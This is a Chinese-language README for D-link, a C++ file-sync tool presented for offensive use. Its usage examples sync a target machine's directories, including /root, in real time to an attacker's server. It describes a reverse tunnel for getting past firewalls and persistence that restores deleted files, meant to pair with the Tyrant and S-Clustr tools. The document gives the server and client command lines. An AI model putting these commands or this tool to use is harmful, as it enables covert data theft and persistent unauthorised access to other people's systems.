D-link

地址:https://github.com/MartinxMax/dlink

D-link 是一个轻量级的 Linux 文件同步工具，使用 C++ 编写。

1. 目录监控与实时同步更新。

2. 访问控制：客户端仅允许自动上传和删除文件，不能下载服务器上的敏感文件。即使同步文件从服务器删除，客户端也会帮助恢复到服务器。

3. 持久性：可以与 Tyrant 或 S-Clustr 一起使用，形成一个强大的自愈网络集群。

4. Tyrant: [https://github.com/MartinxMax/Tyrant]

5. S-Clustr:[https://github.com/MartinxMax/S-Clustr]

6. 通信使用 AES 加密，确保文件同步过程加密，防止中间人攻击。

7. 在文件同步过程中，实时显示上传和下载的数据。

8. 使用密钥进行身份验证，防止未经授权的同步操作。

9. 回环地址同步速度可达 200MB/s，而 LAN 同步速度大约为 20MB/s。

使用方法

$ ./dlink -h

D-link 转发隧道（客户端到服务器文件同步）

示例：（将目标目录实时同步到攻击者的目录）

服务器：

$ ./dlink server --port <LOCAL-PORT> --path <PATH>

客户端：

创建一个 200MB 的测试文件用于传输

$ dd if=/dev/urandom of=rand_file bs=1M count=200

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY>

服务器：

Wireshark:

D-link 反向隧道（服务器到客户端文件同步）

PS：通常用于绕过防火墙并防止数据拦截。

示例：（将攻击者的目录实时同步到目标目录）

服务器：

$ ./dlink server --port <LOCAL-PORT> --path <PATH> --reverse

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY> --reverse

双向同步

服务器：

$ ./dlink server --port 10098 --path /tmp/root --key abcdefgh&
$ ./dlink server --port 10099 --path /tmp/root --key abcdefgh --reverse

客户端：

$ ./dlink client --endpoint "<SERVER>:10098" --path /root --key abcdefgh &
$ ./dlink client --endpoint "<SERVER>:10099" --path /root --key abcdefgh --reverse